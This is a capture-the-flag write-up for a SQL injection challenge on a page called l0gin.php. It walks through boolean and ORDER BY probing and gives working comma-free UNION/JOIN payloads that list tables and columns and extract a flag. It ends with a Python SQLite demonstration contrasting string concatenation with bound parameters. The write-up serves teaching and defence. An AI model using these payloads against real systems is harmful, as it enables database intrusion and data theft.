# [春秋云实企安殿]SQLi

Opening the target address directly redirects to `/b68a89d1c4a097a9d8631b3ac45e8979.php`. Viewing the page source reveals a hint:

![image-20240309102824846](http://cdn.wutongliran.top/img/image-20240309102824846.png)

That hint is a trap. The address that is actually vulnerable to injection is in the body of the 302 response:

![image-20240309103513737](http://cdn.wutongliran.top/img/image-20240309103513737.png)

Comparing the responses to `/l0gin.php?id=1%27and%201=1%23` and `/l0gin.php?id=1%27and%201=2%23` shows that a SQL injection vulnerability exists and that it is string-based:

![image-20240309105546560](http://cdn.wutongliran.top/img/image-20240309105546560.png)

![image-20240309105602392](http://cdn.wutongliran.top/img/image-20240309105602392.png)

`/l0gin.php?id=1%27order%20by%202%23` and `/l0gin.php?id=1%27order%20by%203%23` show that there are 2 echo positions.

Fuzzing shows that the input is truncated at commas, so use comma-free injection.

Query the table names (tables in the current database):

```
l0gin.php?id=-1%27 union select * from (select 1) a join (select group_concat(table_name) from information_schema.tables where table_schema=database()) b %23
```

Query the column names of the `users` table:

```
l0gin.php?id=-1%27 union select * from (select 1) a join (select group_concat(column_name) from information_schema.columns where table_name='users') b %23
```

Query the flag:

```
l0gin.php?id=-1%27 union select * from (select 1) a join (select flag_9c861b688330 from users) b %23
```
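
Why truncating at commas does not fix the injection while a bound parameter does, as an added example that is not code from the challenge. It assumes an in-memory SQLite database as a stand-in for the target's MySQL, and the schema, the `secret` column, the filter and the function names are all constructed for illustration.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the challenge database (SQLite, not MySQL).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT, username TEXT, secret TEXT)")
    db.execute("INSERT INTO users VALUES ('1', 'alice', 'constructed-secret')")
    return db


def comma_filter(value):
    # Assumed filter matching the observed behaviour: input is cut at the first comma.
    return value.split(",", 1)[0]


def lookup_vulnerable(db, user_id):
    # String concatenation: the filtered value still becomes part of the SQL text,
    # so any comma-free SQL syntax in it is parsed and executed.
    sql = "SELECT id, username FROM users WHERE id='" + comma_filter(user_id) + "'"
    return db.execute(sql).fetchall()


def lookup_hardened(db, user_id):
    # Bound parameter: the value is only compared as data and never parsed as SQL,
    # so no input filter is needed at all.
    sql = "SELECT id, username FROM users WHERE id=?"
    return db.execute(sql, (user_id,)).fetchall()


# Constructed input with the same comma-free join shape as the queries on this page.
JOIN_PAYLOAD = "-1' union select * from (select 1) a join (select secret from users) b -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, JOIN_PAYLOAD))  # leaks the secret column
    print("hardened:  ", lookup_hardened(db, JOIN_PAYLOAD))    # no rows
```

In the PHP application the equivalent fix is a prepared statement with a bound `id` value instead of concatenating the request parameter into the query string.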